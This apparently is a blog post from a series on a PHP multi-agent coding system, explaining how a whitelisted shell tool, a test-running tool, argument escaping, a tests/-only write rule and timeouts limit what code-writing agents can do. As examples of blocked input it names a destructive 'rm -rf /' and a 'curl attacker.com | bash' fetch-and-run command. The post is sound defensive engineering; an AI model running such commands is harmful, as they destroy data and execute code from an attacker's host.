Code-writing agents have a unique problem: how do you know the code you just wrote actually works? You can't just generate code and hope — the AI needs to check its own output. BashTool and RunTestsTool make this possible.
BashTool: Whitelisted Shell Access
BashTool allows command execution, but only specific commands:
private const ALLOWED_COMMANDS = [
    'php -l',     // Syntax check
    'php -r',     // Quick PHP execution
    'phpunit',    // Test execution
    'phpstan',    // Static analysis
    'composer',   // Dependency info (not install)
    'git diff',   // See changes
    'git status', // Check state
    'git log',    // History
];
Every command is checked against this whitelist before execution. An agent can't run rm -rf / or curl attacker.com | bash. It can only lint, test, analyze, and inspect.
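The post doesn't show how a command is matched against the whitelist. Here is a minimal sketch that assumes prefix matching on a word boundary plus a blanket ban on shell operators. The operator filter and the isAllowedCommand name are assumptions, not something described above. Without that filter, a plain prefix check would accept "git status; rm -rf /".

```php
<?php
declare(strict_types=1);

// Copied from the BashTool whitelist above.
const ALLOWED_COMMANDS = [
    'php -l', 'php -r', 'phpunit', 'phpstan',
    'composer', 'git diff', 'git status', 'git log',
];

/**
 * Hypothetical check: the command must start with a whitelisted prefix
 * (followed by a space or the end of the string) and must not contain
 * shell operators that could chain, pipe, substitute, or redirect.
 */
function isAllowedCommand(string $command): bool
{
    $command = trim($command);
    // Reject ; & | ` $ < > and newlines outright
    if (preg_match('/[;&|`$<>\r\n]/', $command) === 1) {
        return false;
    }
    foreach (ALLOWED_COMMANDS as $prefix) {
        // Word-boundary match so "phpunitx" does not pass as "phpunit"
        if ($command === $prefix || str_starts_with($command, $prefix . ' ')) {
            return true;
        }
    }
    return false;
}
```

This filter is deliberately blunt. Banning $ also rejects php -r snippets that use variables. And because php -r is whitelisted, an allowed command can still execute arbitrary PHP, so the whitelist narrows the attack surface rather than sealing it.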
Who Gets BashTool
Only VajbCoder and TestAgent. Not ReviewAgent (read-only). Not DocAgent (no need to run commands). Not KIK (orchestrator, not executor).
The reasoning: VajbCoder writes code and needs to verify it compiles. TestAgent writes tests and needs to run them. Other agents don't generate executable artifacts.
The Write-Lint-Test-Fix Loop
VajbCoder's typical iteration pattern:
Iteration 1: Read existing code → understand structure
Iteration 2: Write new code via write_file
Iteration 3: php -l newfile.php → syntax check
    If errors: read the error, fix the code, return to Iteration 2
Iteration 4: phpunit --filter NewFeatureTest → run tests
    If failures: read the failure, fix the code, return to Iteration 2
Iteration 5: phpstan analyze newfile.php → static analysis
    If errors: fix the type hints, return to Iteration 2
Iteration 6: generate_patch (or confirm done) → auto-exit
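The pattern above can be sketched as a small driver loop. This is a hypothetical illustration, not VajbCoder's actual code. The runSelfCheckLoop name, the callback shapes, and the $maxAttempts cap are assumptions. Each check returns null on success or an error string on failure, and the first failure is fed back into the next write.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical write-lint-test-fix driver.
 * $writeCode receives the previous failure (or null) and writes a new version.
 * $checks run in order (e.g. lint, tests, static analysis); each returns
 * null when it passes or an error message when it fails.
 *
 * @param callable(?string): mixed $writeCode
 * @param array<string, callable(): ?string> $checks
 * @return array{status: string, attempts: int, lastError: ?string}
 */
function runSelfCheckLoop(callable $writeCode, array $checks, int $maxAttempts): array
{
    $feedback = null;
    for ($attempt = 1; $attempt <= $maxAttempts; $attempt++) {
        $writeCode($feedback);
        $feedback = null;
        foreach ($checks as $name => $check) {
            $error = $check();
            if ($error !== null) {
                // Stop at the first failing check and go back to writing code
                $feedback = "{$name}: {$error}";
                break;
            }
        }
        if ($feedback === null) {
            return ['status' => 'done', 'attempts' => $attempt, 'lastError' => null];
        }
    }
    // Budget exhausted: report the last failure instead of looping forever
    return ['status' => 'out_of_iterations', 'attempts' => $maxAttempts, 'lastError' => $feedback];
}
```

The iteration cap matters as much as the checks. It is what turns "iterate until it passes" into a loop that is guaranteed to terminate.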
The self-check loop catches three categories of errors:
- Syntax errors: php -l catches missing semicolons and unmatched braces
- Logic errors: phpunit catches wrong behavior and broken assertions
- Type errors: phpstan catches missing type hints and null-safety issues
Without this loop, the agent would generate code in one shot and hand it off. With the loop, the agent iterates until the code passes all checks — or runs out of iterations.
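For the syntax-check step, here is a minimal sketch of running php -l from PHP. It assumes the tool relies on the exit status: php -l exits 0 when the file parses and non-zero otherwise. The lintPhpFile name and its return shape are hypothetical. PHP_BINARY ensures the file is linted by the same interpreter that runs the agent.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical helper: lint one file with `php -l` and report the result.
 *
 * @return array{ok: bool, output: string}
 */
function lintPhpFile(string $path): array
{
    // Escape both the interpreter path and the file path; merge stderr into stdout
    $command = escapeshellarg(PHP_BINARY) . ' -l ' . escapeshellarg($path) . ' 2>&1';
    exec($command, $lines, $exitCode);
    return ['ok' => $exitCode === 0, 'output' => implode("\n", $lines)];
}
```

The output string is what the agent reads in the "If errors" branch. The boolean is what decides whether the loop moves on to phpunit.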
RunTestsTool
A specialized tool for TestAgent:
public function execute(array $params): array
{
    $testFile = $params['file'] ?? null;   // Specific test file
    $filter   = $params['filter'] ?? null; // --filter pattern
    $suite    = $params['suite'] ?? null;  // --testsuite name

    $command = 'php vendor/bin/phpunit';
    // Options first, then the optional test file path (phpunit [options] <file>)
    if ($filter !== null) {
        $command .= ' --filter ' . escapeshellarg($filter);
    }
    if ($suite !== null) {
        $command .= ' --testsuite ' . escapeshellarg($suite);
    }
    if ($testFile !== null) {
        $command .= ' ' . escapeshellarg($testFile);
    }

    // Execute with a 120-second timeout
    $output = $this->executeWithTimeout($command, 120);

    return ['success' => $this->parseSuccess($output), 'content' => $output];
}
Parameters are escaped with escapeshellarg() — no command injection through test file names or filter patterns.
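To see the escaping at work without running PHPUnit, the command assembly can be pulled out into a pure function. buildPhpunitCommand is a hypothetical name, and this sketch places options before the test file path. On POSIX systems, escapeshellarg() wraps each value in single quotes, so a payload like "; rm -rf /" reaches PHPUnit as literal filter text instead of a second shell command.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical pure version of RunTestsTool's command assembly.
 * Every user-supplied value passes through escapeshellarg().
 */
function buildPhpunitCommand(?string $file, ?string $filter, ?string $suite): string
{
    $command = 'php vendor/bin/phpunit';
    if ($filter !== null) {
        $command .= ' --filter ' . escapeshellarg($filter);
    }
    if ($suite !== null) {
        $command .= ' --testsuite ' . escapeshellarg($suite);
    }
    if ($file !== null) {
        $command .= ' ' . escapeshellarg($file);
    }
    return $command;
}
```

Escaping protects against shell injection only. The filter value is still interpreted by PHPUnit as a regular-expression pattern, which is the intended behavior.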
TestAgent's Loop
Iteration 1: Read source code to understand what to test
Iteration 2: Read existing tests for patterns
Iteration 3: Write test file via write_file (tests/ only)
Iteration 4: run_tests(file: 'tests/Unit/NewTest.php')
If fail: read output, fix test, rewrite
Iteration 5: run_tests(filter: 'NewTest') → confirm pass
TestAgent's WriteFileTool is restricted to tests/ — it can't accidentally modify production code while fixing a test failure.
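The post doesn't show how the tests/ restriction is enforced. One plausible approach is a lexical path check. In the sketch below, isWritableTestPath is hypothetical. The path is normalized without realpath(), because a new test file doesn't exist yet and realpath() returns false for missing files. The check rejects absolute paths and any ".." that climbs out of tests/. Symlinks inside tests/ are not resolved by this sketch.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical guard for a tests/-only WriteFileTool.
 * Returns true only for a relative path that, after resolving "." and "..",
 * points to a file strictly inside $allowedRoot.
 */
function isWritableTestPath(string $relativePath, string $allowedRoot = 'tests'): bool
{
    $normalized = str_replace('\\', '/', $relativePath);
    // Absolute POSIX paths and Windows drive paths are never allowed
    if ($normalized === '' || $normalized[0] === '/' || preg_match('#^[A-Za-z]:#', $normalized) === 1) {
        return false;
    }
    $segments = [];
    foreach (explode('/', $normalized) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..') {
            if ($segments === []) {
                return false; // would climb above the project root
            }
            array_pop($segments);
            continue;
        }
        $segments[] = $segment;
    }
    // Must name something below the root, e.g. tests/Unit/FooTest.php
    return count($segments) >= 2 && $segments[0] === $allowedRoot;
}
```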
Command Timeout
Both tools enforce execution timeouts:
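private function executeWithTimeout(string $command, int $timeoutSeconds): string
{
    $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']]; // capture stdout and stderr
    $process = proc_open($command, $descriptors, $pipes);
    $start = microtime(true);
    $output = '';
    while (proc_get_status($process)['running']) {
        // ... append non-blocking reads of $pipes[1] and $pipes[2] to $output ...
        if (microtime(true) - $start > $timeoutSeconds) {
            proc_terminate($process);
            return "Command timed out after {$timeoutSeconds}s";
        }
    }
    // ... drain remaining output, close pipes, proc_close($process) ...
    return $output;
}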
Default timeout: 120 seconds. Long enough for a full PHPUnit suite, short enough to prevent infinite loops.
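The excerpt above elides the read loop. Here is a self-contained sketch of the same idea, assuming PHP 8 on a POSIX system. runWithTimeout is a hypothetical name. It polls non-blocking pipes every 50 ms instead of using stream_select(), which keeps the code short at the cost of some idle wake-ups.

```php
<?php
declare(strict_types=1);

/**
 * Hypothetical standalone version: run a command, collect stdout and stderr,
 * and kill the process if it runs longer than $timeoutSeconds.
 * An array command (PHP 7.4+) runs the binary directly, without /bin/sh.
 */
function runWithTimeout(array|string $command, int $timeoutSeconds): string
{
    $descriptors = [1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $process = proc_open($command, $descriptors, $pipes);
    if (!is_resource($process)) {
        return 'Failed to start command';
    }
    stream_set_blocking($pipes[1], false);
    stream_set_blocking($pipes[2], false);

    $output = '';
    $start = microtime(true);
    while (true) {
        // Drain what is available so the child never blocks on a full pipe buffer
        $output .= stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
        if (!proc_get_status($process)['running']) {
            break;
        }
        if (microtime(true) - $start > $timeoutSeconds) {
            proc_terminate($process); // SIGTERM by default
            fclose($pipes[1]);
            fclose($pipes[2]);
            proc_close($process);
            return "Command timed out after {$timeoutSeconds}s";
        }
        usleep(50_000); // poll every 50 ms
    }
    // Pick up anything written between the last read and process exit
    $output .= stream_get_contents($pipes[1]) . stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    proc_close($process);
    return $output;
}
```

Passing the command as an array means proc_terminate() signals the test process itself. With a string command, the signal can land on the wrapping shell instead and leave the real process running.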
Why Not Give Every Agent BashTool
Shell access is the most powerful tool. An agent with BashTool can:
- Read any file (via cat)
- List directories (via ls)
- Check git history (via git log)
- Run arbitrary PHP (via php -r)
Even with a whitelist, it's more capability than most agents need. ReviewAgent only needs to read — giving it BashTool would be capability bloat that increases attack surface without benefit.
The principle: every agent gets the minimum tools for its job. VajbCoder needs to lint and test its output → BashTool. ReviewAgent needs to read code → ReadFileTool. KIK needs to delegate → DelegateAgentTool.
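The minimum-tools principle can be enforced as a deny-by-default lookup. The map below is a hypothetical, partial illustration built from the assignments mentioned in this post. Giving ReadFileTool and WriteFileTool to VajbCoder and TestAgent is an assumption, and DocAgent is omitted because its tools aren't listed here.

```php
<?php
declare(strict_types=1);

// Hypothetical, partial agent-to-tool map (not the project's real configuration).
const AGENT_TOOLS = [
    'VajbCoder'   => ['ReadFileTool', 'WriteFileTool', 'BashTool'],
    'TestAgent'   => ['ReadFileTool', 'WriteFileTool', 'BashTool', 'RunTestsTool'],
    'ReviewAgent' => ['ReadFileTool'],
    'KIK'         => ['DelegateAgentTool'],
];

// Deny by default: unknown agents and unlisted tools get nothing.
function agentCanUse(string $agent, string $tool): bool
{
    return in_array($tool, AGENT_TOOLS[$agent] ?? [], true);
}
```

Keeping the grant list explicit means that adding a new agent gives it no tools until someone deliberately assigns them.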
Up Next
Next up: ManageScheduleTool and SharedContextTool: Scheduling and Cross-Run Memory — how KIK manages scheduled agent runs via natural language, and how agents persist knowledge across executions.